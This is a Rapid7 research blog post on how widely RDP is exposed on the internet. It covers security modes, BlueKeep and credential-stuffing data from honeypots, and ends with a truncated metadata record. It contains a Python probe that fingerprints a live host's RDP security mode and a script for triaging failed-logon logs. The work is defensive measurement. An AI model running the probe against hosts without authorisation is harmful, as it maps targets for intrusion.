
Welcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?
So, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!
#### [Research] Read the full NICER report today
[Get Started](<https://www.rapid7.com/info/nicer-2020/>)
## Remote Desktop — RDP (3389)
_It's like VNC, but more Microsofty._
### TLDR
**WHAT IT IS:** A proprietary protocol developed by Microsoft for making graphical user interface (GUI) connections from one system to another. The default port is TCP/3389, but it can be hosted on any open port.
**HOW MANY:** 3,979,356 discovered nodes. 44,540 (1.1%) have Recog operating system fingerprints. 3,974,474 (99.8%) have Recog fingerprints for the security scheme (the security layer the server negotiates; see Discovery details).
**VULNERABILITIES:** Numerous remote code execution issues, including [CVE-2019-0708 (BlueKeep)](<https://attackerkb.com/topics/huQasjoVMS/windows-remote-desktop-rdp-use-after-free-vulnerablility-bluekeep>), a pre-authentication use-after-free disclosed by Microsoft in the spring of 2019.
**ADVICE:** Place RDP behind a VPN connection if it needs to be “always on.” If RDP can be made intermittently available, ensure all nodes exposing RDP are fully patched, hardened to recommended specifications (network level authentication required, legacy “standard” security disabled), and protected by multi-factor authentication.
**ALTERNATIVES:** This is Microsoft’s recommended solution for remote GUI access to Windows systems. It does what it says on the tin pretty well, so there are no real alternatives. If you need this type of access, follow the guidance in the Advice section.
**GETTING:** Slightly better! We saw almost 5% fewer RDP nodes than we measured in 2019.
### Discovery details
[Project Sonar](<https://www.rapid7.com/research/project-sonar/>) found just under 4 million active RDP nodes, with over a quarter of them in China-homed networks.

Unsurprisingly, we also find about a quarter of RDP nodes within our in-scope cloud provider networks—after all, one does need to connect to these remote systems to use them—though we would have expected Microsoft Azure to take the top spot (given, y’know, “Windows”). So, imagine our surprise when we found Azure-hosted RDP came in third. It's a strong third place, though, behind the twin cloud giants Amazon and Alibaba.
RDP is everywhere, with a total population an order of magnitude larger than VNC’s (about 4 million and change versus fewer than 400,000 for VNC). Apart from the aforementioned “cloud” use case, small businesses run it off business-class ISP connections; enterprises use it for remote access and administration; retail operations often have RDP enabled on point-of-sale systems for routine management; and home users find it easy enough that they take the time to poke holes in their firewalls to reach their home PCs. This ubiquity, along with pervasive misconfigurations and vulnerabilities, makes it an ideal target for attackers, which we’ll cover in the next section.
There are [many ways](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5073f4ed-1e93-45e1-b039-6e30c385867c>) to configure RDP sessions, and Project Sonar can identify three states from the security protocol a server selects during the initial X.224 connection handshake: “standard” (or “legacy”) RDP security, transport layer security (TLS), and network level authentication (NLA, which is CredSSP authentication carried over TLS). “Standard” is a train wreck waiting to happen: the session is RC4-encrypted under keys exchanged via a server key the client has no trustworthy way to verify, so a man-in-the-middle can impersonate the server, and the entire pre-authentication protocol stack is reachable by anyone who can reach the port. Both NLA and TLS do a fairly good job securing your sessions (provided you’re patching regularly and using safe configurations with multi-factor authentication), with NLA the stronger of the two because the client must authenticate before any session is created. And, from the looks of it, most residential and business-class users seem to have received that memo, given the high percentage of nodes in the top 10 countries and in the clouds that use the more secure connection options:

However, not all clouds are created equal: Oracle Cloud users limp in dead last (again, by percent of nodes in that cloud) when it comes to use of the safer security modes. This is likely due to the default settings applied when RDP is enabled on those images.
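The three security states above are visible in the very first round trip: the client sends an X.224 Connection Request carrying an RDP_NEG_REQ that lists the protocols it supports, and the server answers with a Connection Confirm that either selects one (RDP_NEG_RSP), rejects the offer (RDP_NEG_FAILURE), or, on a legacy-only host, carries no negotiation structure at all. The following Python is an added example of how such a classifier works; it is not Project Sonar's code. The byte layout and flag values are taken from MS-RDPBCGR, the sample replies are constructed rather than captured, and the `probe()` helper is the only part that touches the network.

```python
"""Classify an RDP endpoint's security mode from its X.224 Connection Confirm.

Added example; this is not Rapid7 or Project Sonar code. Constants and framing
follow MS-RDPBCGR 2.2.1.1 / 2.2.1.2 (TPKT + X.224 + RDP_NEG_REQ/RSP/FAILURE).
Sample responses below are constructed, not captured from a real server.
"""
import socket
import struct
import sys

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR 2.2.1.1.1)
PROTOCOL_RDP = 0x00000000        # "standard"/legacy RDP security (RC4, unverifiable server key)
PROTOCOL_SSL = 0x00000001        # TLS
PROTOCOL_HYBRID = 0x00000002     # CredSSP over TLS, i.e. NLA
PROTOCOL_HYBRID_EX = 0x00000008  # NLA with early user authorization result

TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03

FAILURE_CODES = {
    0x01: "SSL_REQUIRED_BY_SERVER",
    0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER",
    0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER",
    0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols: int) -> bytes:
    """TPKT header + X.224 Connection Request TPDU carrying an RDP_NEG_REQ."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR fixed part: LI (excludes itself), code 0xE0, dst-ref, src-ref, class 0
    x224 = struct.pack("!BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0) + neg_req
    return struct.pack("!BBH", 3, 0, 4 + len(x224)) + x224


def classify_connection_confirm(data: bytes) -> dict:
    """Return the mode the server selected ("standard", "tls", "nla") or the failure reason.

    Servers that only speak standard security reply with a bare CC TPDU and no
    RDP_NEG_RSP at all, so an absent negotiation response is itself the answer.
    """
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT-framed X.224 packet")
    if struct.unpack("!H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length does not match payload")
    li, code = data[4], data[5]
    if (code & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    neg = data[11:5 + li]  # variable part after the 6-byte fixed CC header
    if len(neg) < 8:
        return {"mode": "standard", "detail": "no RDP_NEG_RSP: legacy RDP security only"}
    typ, flags, length, value = struct.unpack("<BBHI", neg[:8])
    if typ == TYPE_RDP_NEG_FAILURE:
        return {"mode": "failure", "detail": FAILURE_CODES.get(value, f"unknown code {value:#x}")}
    if typ != TYPE_RDP_NEG_RSP or length != 8:
        raise ValueError("malformed RDP negotiation response")
    if value & (PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX):
        mode = "nla"
    elif value & PROTOCOL_SSL:
        mode = "tls"
    else:
        mode = "standard"
    return {"mode": mode, "selected": value, "flags": flags}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-packet")
        buf += chunk
    return buf


def probe(host: str, port: int = 3389, timeout: float = 5.0) -> dict:
    """One unauthenticated round trip: offer TLS and NLA, see what the server picks.

    Offering only PROTOCOL_SSL instead reveals whether NLA is *required*: such a
    server answers RDP_NEG_FAILURE with HYBRID_REQUIRED_BY_SERVER.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request(PROTOCOL_SSL | PROTOCOL_HYBRID))
        hdr = _recv_exact(s, 4)
        total = struct.unpack("!H", hdr[2:4])[0]
        return classify_connection_confirm(hdr + _recv_exact(s, total - 4))


# Constructed sample replies (TPKT + X.224 CC [+ RDP_NEG_RSP/FAILURE]), not real captures.
SAMPLE_NLA_CONFIRM = bytes.fromhex("03000013" "0ed0" "0000" "1234" "00" "0200" "0800" "02000000")
SAMPLE_LEGACY_CONFIRM = bytes.fromhex("0300000b" "06d0" "0000" "1234" "00")
SAMPLE_NLA_REQUIRED = bytes.fromhex("03000013" "0ed0" "0000" "1234" "00" "0300" "0800" "05000000")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        for sample in (SAMPLE_NLA_CONFIRM, SAMPLE_LEGACY_CONFIRM, SAMPLE_NLA_REQUIRED):
            print(classify_connection_confirm(sample))
```

On the Windows side, the outcome this classifier sees is governed by two values under `HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp`: `SecurityLayer` (0 = legacy RDP security, 1 = negotiate, 2 = TLS only) and `UserAuthentication` (1 = require NLA). A host that answers with a bare Connection Confirm is the `SecurityLayer = 0` case; a host that answers `HYBRID_REQUIRED_BY_SERVER` when offered only TLS is the hardened case the Advice section asks for.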
### Attacker’s view
This is one protocol we do have robust honeypot coverage for, and we’ll focus on two areas: RDP session establishment and attempts to exploit RDP via BlueKeep.
Despite predictions of cyber-doom and gloom, BlueKeep, the unauthenticated remote code execution flaw in RDP disclosed by Microsoft in the spring of 2019, pretty much faded into the background, possibly because folks actually patched and switched to NLA (as we see in the country and cloud top views, and in the fact that 92% of surveyed RDP nodes were using NLA). NLA matters here because the vulnerable channel-handling code is only reached after the connection sequence has run; requiring CredSSP authentication up front means an anonymous exploit attempt never gets there, which is why Microsoft listed NLA as a partial mitigation. We posit that the early, consistent, measured warnings at all levels helped keep BlueKeep from being the nightmare it could have been.
That does not mean there is no evidence of BlueKeep activity; however, we tend to see orders of magnitude more credential stuffing attempts than we do BlueKeep exploit attempts:

There are four takeaways from the above figure:
1. The BlueKeep volume is super low.
2. The number of unique source hosts with malicious intent is low.
3. RDP activity is a constant.
4. Attackers thought they might get lucky right around the time the U.S. entered lockdown because of the 2020 pandemic.
Between Jan. 1, 2020, and April 30, 2020, Heisenberg (our honeypot network) caught just over 8,500 distinct source IP addresses either attempting BlueKeep-based exploits or performing credential stuffing against those honeypots. Eleven percent (11%) of these unique IPv4 addresses originate from DigitalOcean, but 16% of all malicious RDP traffic comes from Hostkey, a hosting provider in the Netherlands. While those two network sources do stand out, 1,310 distinct autonomous systems (ASes) are hosting sources with malicious intent, so there are plenty of places to wag one’s chastisement finger at.
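The credential stuffing that dominates the honeypot data above shows up on a real exposed host as a stream of Windows Security event 4625 (logon failure) records. The following Python is an added example, not Heisenberg or any Rapid7 code, of the triage a defender would run over an export of those events: it groups failures by source address, measures the densest burst inside a sliding window, and separates password spraying (many accounts, one guess each) from brute force (one account, many guesses). The event tuples are constructed, the field names mirror the 4625 schema, and the window and threshold values are arbitrary starting points.

```python
"""Triage failed RDP logons for credential stuffing, spraying, and brute force.

Added example; this is not Rapid7 Heisenberg code. Events are tuples of
(TimeCreated, IpAddress, LogonType, TargetUserName) as you would export from
Windows Security event 4625. The sample below is constructed, not captured.
LogonType 10 is an interactive RDP logon; with NLA enabled a failed attempt is
usually recorded as type 3 (network) because CredSSP authenticates before any
session exists, so both types are treated as RDP here.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RDP_LOGON_TYPES = {"3", "10"}

SPRAY_USERS = ["administrator", "admin", "backup", "scan", "sql", "test", "user", "guest"]
SAMPLE_4625 = (
    # one source, eight accounts, one guess each inside 50 seconds: password spray
    [(f"2020-03-20T02:00:{i * 7:02d}", "203.0.113.7", "10", u) for i, u in enumerate(SPRAY_USERS)]
    # one source hammering Administrator: classic brute force (NLA host, so type 3)
    + [(f"2020-03-20T02:1{m}:{i * 15:02d}", "198.51.100.23", "3", "Administrator")
       for m in (0, 1) for i in range(4)]
    # a user mistyping a password twice, plus an unrelated console logon (type 2)
    + [("2020-03-20T02:30:00", "192.0.2.10", "10", "alice"),
       ("2020-03-20T02:31:10", "192.0.2.10", "10", "alice"),
       ("2020-03-20T02:32:00", "192.0.2.10", "2", "alice")]
)


def max_in_window(times, window: timedelta) -> int:
    """Largest number of timestamps that fall inside any span of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def triage(events, window=timedelta(minutes=10), threshold=5) -> dict:
    """Group RDP 4625 events by source address and label each source's behaviour."""
    by_src = defaultdict(list)
    for ts, src, logon_type, user in events:
        if logon_type in RDP_LOGON_TYPES:
            by_src[src].append((datetime.fromisoformat(ts), user.lower()))
    findings = {}
    for src, rows in by_src.items():
        burst = max_in_window([t for t, _ in rows], window)
        users = {u for _, u in rows}
        if burst < threshold:
            verdict = "below-threshold"
        elif len(users) >= threshold:
            verdict = "password-spray"   # many accounts, few guesses per account
        else:
            verdict = "brute-force"      # one or two accounts, many guesses
        findings[src] = {"attempts": len(rows), "burst": burst,
                         "users": len(users), "verdict": verdict}
    return findings


if __name__ == "__main__":
    for src, f in sorted(triage(SAMPLE_4625).items(), key=lambda kv: -kv[1]["burst"]):
        print(f"{src:16} {f['verdict']:16} attempts={f['attempts']} burst={f['burst']} users={f['users']}")
```

Keying on the burst rather than the raw total is what keeps a user who fat-fingers a password from tripping the same alarm as a bot; the flip side is that a slow, distributed spray spread across the 1,310 ASes mentioned above will sit under any single-source threshold, which is the argument for correlating by target account as well as by source.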
### Our advice
**IT and IT security teams **should strongly consider putting RDP behind a VPN if they are heck-bent on using RDP for GUI remote access. If you need to place RDP directly on the internet, consider doing so on an as-needed basis and ensuring all systems with RDP exposed are patched and have RDP configured as strongly as possible, backed by multi-factor authentication.
**Cloud providers** should have amazingly secure defaults and regularly warn users if they deploy RDP with weaker settings. Giving users the ability to easily enable RDP for only a certain period of time would go a long way toward helping thwart credential stuffing attacks. To help make the internet a bit safer, providers should also monitor for malicious traffic and work with regional CERTs to shut down malicious nodes as soon as possible.
**Government cybersecurity agencies** should continue to educate their constituents on the dangers of RDP and how to ensure safe use of RDP. Given that there are fairly well-known sources with evil intent, these agencies should work with regional CERTs, hosting/cloud providers, and ISPs to make it easier to stop bad traffic before it compromises remote hosts.
#### NEVER MISS A BLOG
Get the latest stories, expertise, and news about security today.
Subscribe
{"id": "RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1", "type": "rapid7blog", "bulletinFamily": "info", "title": "NICER Protocol Deep Dive: Internet Exposure of Remote Desktop (RDP)", "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## Remote Desktop \u2014 RDP (3389)\n\n_It's like VNC, but more Microsofty._\n\n### TLDR\n\n**WHAT IT IS: **A proprietary protocol developed by Microsoft for making graphical user interface (GUI) connections from one system to another. The default port is TCP/3389, but it can be hosted on any open port.\n\n**HOW MANY: **3,979,356 discovered nodes. 44,540 (1.1%) have Recog operating system fingerprints. 
3,974,474 (99.8%) have Recog fingerprints for security scheme\n\n**VULNERABILITIES: **Numerous remote code execution issues including [CVE-2019-0708 (BlueKeep)](<https://attackerkb.com/topics/huQasjoVMS/windows-remote-desktop-rdp-use-after-free-vulnerablility-bluekeep>) disclosed by Microsoft in the spring of 2019.\n\n**ADVICE:** Place RDP behind a VPN connection if it needs to be \u201calways on.\u201d If RDP can be made intermittently available, ensure all nodes exposing RDP are fully patched, hardened to recommended specifications, and utilize multi-factor authentication.\n\n**ALTERNATIVES:** This is Microsoft\u2019s recommended solution for remotely accessing remote systems. It does what it says on the tin pretty well, so there are no real alternatives. If you need this type of access, follow the guidance in the Advice section.\n\n**GETTING: **Slightly better! We saw almost 5% fewer RDP than we measured in 2019.\n\n### Discovery details\n\n[Project Sonar](<https://www.rapid7.com/research/project-sonar/>) found just under 4 million active RDP nodes, with over a quarter of them in China-homed networks.\n\n\n\nUnsurprisingly, we also find about a quarter of RDP nodes within our in-scope cloud provider networks\u2014after all, one does need to connect to these remote systems to use them\u2014though we would have expected Microsoft Azure to take the top spot (given, y\u2019know, \u201cWindows\u201d). So, imagine our surprise when we found Azure-hosted RDP came in third. It's a strong third place, though, behind the twin cloud giants Amazon and Alibaba.\n\nRDP is everywhere, with a total population an order of magnitude more than VNC (about 4 million and change versus less than 400,000 for VNC). 
Apart from the aforementioned \u201ccloud\u201d use case, small businesses use it off of business-class ISP connections; enterprises use it for remote access and administration; retail operations often have RDP enabled on point-of-sale systems for routine management; and, home users, too, find it easy enough to use to take the time to poke holes in their firewalls to enable remote access to home PCs. This ubiquity, along with pervasive misconfigurations and vulnerabilities, make it an ideal target for attackers, which we\u2019ll cover in the next section.\n\nThere are [many ways](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5073f4ed-1e93-45e1-b039-6e30c385867c>) to configure RDP sessions, and Project Sonar is able to identify three states: \u201cstandard\u201d or \u201clegacy,\u201d \u201cnetwork level authentication\u201d (NLA), and transport layer security (TLS). \u201cStandard\u201d is a train wreck waiting to happen, and both NLA and TLS do a fairly good job securing your sessions (provided you\u2019re patching regularly and using safe configurations with multi-factor authentication). And, from the looks of it, most residential and business-class users seem to have received that memo given the high percentage of nodes in the top 10 countries and the fact that clouds are using more secure connection options:\n\n\n\nHowever, all clouds are not created nearly as equal, with Oracle cloud users limping in dead last (again, by percent of nodes in that cloud) when it comes to use of safer security modes. 
This is likely due to the default settings when enabling RDP.\n\n### Attacker\u2019s view\n\nThis is one protocol we do have robust honeypot coverage for, and we\u2019ll focus on two areas: RDP session establishment and attempts to exploit RDP via BlueKeep.\n\nDespite predictions for cyber-doom and gloom, BlueKeep\u2014the unauthenticated remote code execution flaw in RDP, disclosed by Microsoft in the spring of 2019\u2014pretty much faded into the background, possibly due to folks actually patching and switching to NLA security (as we see in the country and cloud top views and in the fact that 92% of surveyed RDP nodes were using NLA). We posit that the early, and consistent, measured warnings at all levels helped keep BlueKeep from being the nightmare it could have been.\n\nThat does not mean there is no evidence of BlueKeep activity; however, we tend to see orders of magnitude more credential stuffing attempts than we do use of BlueKeep:\n\n\n\nThere are four takeaways from the above figure:\n\n 1. The BlueKeep volume is super low.\n 2. The number of unique source hosts with malicious intent is low.\n 3. RDP activity is a constant.\n 4. Attackers thought they might get lucky right around the time the U.S. entered lockdown because of the 2020 pandemic.\n\nBetween Jan. 1, 2020, and April 30, 2020, Heisenberg caught just over 8,500 distinct source IP addresses trying to use either BlueKeep-based exploits or perform credential stuffing against our honeypot network. Eleven percent (11%) of these unique IPv4 addresses originate from DigitalOcean, but 16% of all malicious RDP traffic comes from Hostkey, a hosting provider in the Netherlands. 
While those two network sources do stand out, 1,310 distinct autonomous systems (ASes) are hosting sources with malicious intent, so there are plenty of places to wag one\u2019s chastisement finger at.\n\n### Our advice\n\n**IT and IT security teams **should strongly consider putting RDP behind a VPN if they are heck-bent on using RDP for GUI remote access. If you need to place RDP directly on the internet, consider doing so on an as-needed basis and ensuring all systems with RDP exposed are patched and have RDP configured as strongly as possible, backed by multi-factor authentication.\n\n**Cloud providers** should have amazingly secure defaults and regularly warn users if they deploy RDP with weaker settings. Giving users the ability to easily enable RDP for only a certain period of time would go a long way toward helping thwart credential stuffing attacks. To help make the internet a bit safer, providers should also monitor for malicious traffic and work with regional CERTs to shut down malicious nodes as soon as possible.\n\n**Government cybersecurity agencies **should continue to educate their constituents on the dangers of RDP and how to ensure safe use of RDP. 
Given that there are fairly well-known sources with evil intent, centers should work with regional CERTs and hosting/cloud providers and ISPs to make it easier to stop bad traffic before it compromises remote hosts.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "published": "2020-10-23T17:26:31", "modified": "2020-10-23T17:26:31", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2020/10/23/nicer-protocol-deep-dive-internet-exposure-of-remote-desktop-rdp/", "reporter": "Tod Beardsley", "references": [], "cvelist": ["CVE-2019-0708"], "lastseen": "2020-10-23T18:41:37", "viewCount": 1064, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:17442CEB-043D-4879-BE5C-FC920511E791", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A"]}, {"type": "canvas", "idList": ["BLUEKEEP"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0657"]}, {"type": "cisa", "idList": ["CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:A5265FFF4C417EB767D82231D2D604B8"]}, {"type": "cve", "idList": ["CVE-2019-0708"]}, {"type": "exploitdb", "idList": ["EDB-ID:46904", "EDB-ID:47120", "EDB-ID:47416"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "fireeye", "idList": ["FIREEYE:385EC2DA0B6E50D0AC9113A707F5E623"]}, {"type": "githubexploit", "idList": ["03237B57-97DA-5A83-B4B2-869C01BC59F7", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "154F9E24-FA6C-529E-8E63-1351432DF6B9", 
"17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "19F70587-89FB-5855-A578-0E55C3510C59", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "462438E9-2947-5006-9134-9BA0BCC1B262", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4E477E4A-4794-5B4A-8706-915B06422C95", "523F993F-2487-5C75-A910-22605D6D57D9", "560405C4-4806-5173-B662-F9C3D776D8D4", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "851959DE-3B5C-5317-868E-5D80E801E3B0", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9D170C46-A745-5692-BA84-67EBFEA037FF", "A839FA86-0873-592C-AA31-2C445B4C4F29", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BE90B1DD-521D-540C-8554-5454779256A5", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", 
"DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "kaspersky", "idList": ["KLA11706"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:2730308475904875028", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4482238198881011483", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:C93CCA23099AC250E702848B49677D5B"]}, {"type": "malwarebytes", "idList": 
["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB", "MALWAREBYTES:8B41C7471B07595F7246D3DCB8794894"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP/", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE/", "MSF:ILITIES/MSFT-CVE-2019-0708/"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201995234", "MYHACK58:62201995523", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["7286.PASL", "MSRDP_CVE-2019-0708.NBIN", "SMB_NT_MS19_MAY_4499149.NASL", "SMB_NT_MS19_MAY_4499164.NASL", "SMB_NT_MS19_MAY_XP_2003.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153133", "PACKETSTORM:153627", "PACKETSTORM:154579", "PACKETSTORM:162960"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532", "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", 
